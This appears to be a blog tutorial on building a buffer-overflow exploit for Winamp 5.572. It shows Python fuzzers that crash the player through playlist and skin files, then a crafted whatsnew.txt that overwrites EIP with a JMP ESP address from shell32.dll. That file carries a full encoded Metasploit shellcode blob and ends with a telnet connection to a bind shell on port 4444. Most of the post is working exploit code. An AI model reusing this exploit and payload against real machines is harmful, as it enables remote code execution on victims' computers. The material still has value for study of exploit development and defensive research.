Lets start..
1. Through playlist file
- First, I make a fuzzer to generate a file that can be executed by winamp like *.mp3, *.mpeg, m3u, *.pls, etc.
In this time I using *.m3u extension
#!usr/bin/python
file ="test2.m3u" <== the file that will executed by winamp
dead ="\x41" * 950000000
file=open(file,'w')
file.write(dead)
print"The File are created..."
file.close()
- Open winamp application with ollydbg
- Then open the playlist file (*.m3u)
- We can see, winamp application crashes
2. Through Skin file (*.xml)
- Make the fuzzer to generate the file xml
#!usr/bin/python
file ="skin.xml"
dead ="\x41" * 950000000
file=open(file,'w')
file.write(dead)
print"The File are created..."
file.close()
(in the way, the file not executed by winamp via playlist. But the file will replace existing file on skin directory)
- I will replace existing skin file on Bigbento skins, Open skin directory C:\Program Files\Winamp\Skins\Big Bento and then paste the file that generated by fuzzer
The original file from winamp
The file generated from fuzzer
- Then open winamp application and click main menu => Skins => Select Big Bento
- The application crashes
- Report Not Responding from windows
- Customization the fuzzer with change on output file and enter the name application.
#!usr/bin/python
file ="whatsnew.txt"
dead ="Winamp 5.572" + "\x41" * 700 + "\r\n\r\n"
file=open(file,'w')
file.write(dead)
print"The File are created..."
file.close()
Run the fuzzer and then copy whatsnew.txt to Winamp directory
- Open application and attach to ollydbg, then klik on menu Help => About Winamp
- The next step is search offset to overwrite SEH using pattern
Create a pattern as big as 700 using tool on Metasploit and enter on fuzzer
#!usr/bin/python
file ="whatsnew.txt"
dead ="Winamp 5.572" + "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2A" + "\r\n\r\n"
file=open(file,'w')
file.write(dead)
print"The File are created..."
file.close()
See the EIP value and make a note to count the offset.
- Count offset with pattern_offset
Customization the fuzzer like below :
#!usr/bin/python
file ="whatsnew.txt"
dead ="Winamp 5.572"
dead+="\x90" * 540
dead+="\xEF\xBE\xAD\xDE"
dead+="\x90" * (700 - len(dead))
dead+="\r\n\r\n"
file=open(file,'w')
file.write(dead)
print"The File are created..."
file.close()
Ok, see on above EIP was overwritten with 'DEADBEEF', this means that the calculation of the offset is correct.
- Then searching address JMP ESP, JMP ESP is the stepping stone to access the payload
Click tab view => Executable Modes or press alt+E, afterthat select process shell32.dll
Press Ctrl+F then type 'JMP ESP' then click find
Yes, now we was found the steping stone address namely 7CA7A4EE
- Now enter the address to fuzzer and type using little-endian
#!usr/bin/python
file ="whatsnew.txt"
#dead ="Winamp 5.572" + "\x41" * 700 + "\r\n\r\n"
dead ="Winamp 5.572"
dead+="\x90" * 540
dead+="\xEE\xA4\xA7\x7C" <====
dead+="\xCC" * (700 - len(dead))
dead+="\r\n\r\n"
file=open(file,'w')
file.write(dead)
print"The File are created..."
file.close()
- repeat step like the previous step
- Generate payload
Go to directory of Metasploit and type ./msfweb
root@bt:/pentest/exploits/framework2# ./msfweb
+----=[ Metasploit Framework Web Interface (127.0.0.1:55555)
Now generate the payload
- After generate the payload, now is the time to enter to fuzzer
#!usr/bin/python
file ="whatsnew.txt"
#dead ="Winamp 5.572" + "\x41" * 700 + "\r\n\r\n"
dead ="Winamp 5.572"
dead+="\x90" * 540
dead+="\xEE\xA4\xA7\x7C"
dead+="\x90" * 32
dead+=("\x31\xc9\xda\xcb\xb1\x51\xd9\x74\x24\xf4\x5b\xba\xc2\x07\x41\x8f"
"\x31\x53\x15\x83\xc3\x04\x03\x91\x16\xa3\x7a\xe9\x73\xc8\xc8\xf9"
"\x7d\xf1\x2c\x06\x1d\x85\xbf\xdc\xfa\x12\x7a\x20\x88\x59\x80\x20"
"\x8f\x4e\x01\x9f\x97\x1b\x49\x3f\xa9\xf0\x3f\xb4\x9d\x8d\xc1\x24"
"\xec\x51\x58\x14\x8b\x92\x2f\x63\x55\xd8\xdd\x6a\x97\x36\x29\x57"
"\x43\xed\xfa\xd2\x8e\x66\xa5\x38\x50\x92\x3c\xcb\x5e\x2f\x4a\x94"
"\x42\xae\xa7\x29\x57\x3b\xbe\x41\x83\x27\xa0\x5a\xfa\x8c\x46\xd7"
"\xbe\x02\x0c\xa7\x4c\xe8\x62\x3b\xe0\x65\xc2\x4b\xa4\x11\x4d\x05"
"\x56\x0e\x01\x66\xb0\xa8\xf1\xfe\x55\x06\xc4\x96\xd2\x1b\x1a\x39"
"\x49\x23\x8a\xad\xba\x36\xd7\x16\x6d\x36\xfe\x37\x04\x2d\x99\x46"
"\xfb\xa6\x64\x1d\x6e\xb5\x97\x4d\x06\x60\x6e\x98\x7a\xc5\x8e\xb4"
"\xd6\xb9\x23\x6b\x8a\x7e\x97\xc8\x7f\x7e\xc7\xa8\x17\x91\xb4\x52"
"\xbb\x18\xa5\x0f\x53\xbf\x3c\x5f\x63\xe8\xbf\x49\x01\x07\x11\x20"
"\x29\xf7\xf9\x6e\x78\xd6\x10\x39\x7c\xf1\xb0\x90\x7d\x2e\x5e\xff"
"\xcb\x49\xd6\xa8\x34\x83\xb9\x02\x9f\x79\xc5\x7a\x8c\xea\xde\x03"
"\x75\x93\x77\x0c\xaf\x31\x87\x22\x36\xd0\x13\xa4\xdf\x47\xb1\xa1"
"\xc5\xe2\x19\xe8\x2c\x3f\x10\xed\x45\xfb\xaa\x13\xa8\xc3\x5e\x79"
"\x35\x81\x8d\x83\x88\x2a\x5d\xf6\x77\x0b\xca\xa3\x23\x03\x7e\x4d"
"\x80\xc2\x81\xc4\xa3\x15\xab\x7d\x7b\xb8\x05\xd0\xd2\x56\xa7\x83"
"\x85\xf3\xf6\xdc\xf6\x94\x55\xfb\xf2\xaa\xf5\x04\x2a\x58\x05\x05"
"\xe4\x62\x29\x72\x5c\x61\x49\x40\x07\x66\x98\x1a\x37\x48\x4d\xe4"
"\x1f\x8b\xfd\x4b\x5f\x9a\xfd\xbb")
dead+="\x90" * (700 - len(dead))
dead+="\r\n\r\n"
file=open(file,'w')
file.write(dead)
print"The File are created..."
file.close()
- Then type root@bt:~/Winamp# telnet 192.168.56.101 4444
No comments:
Post a Comment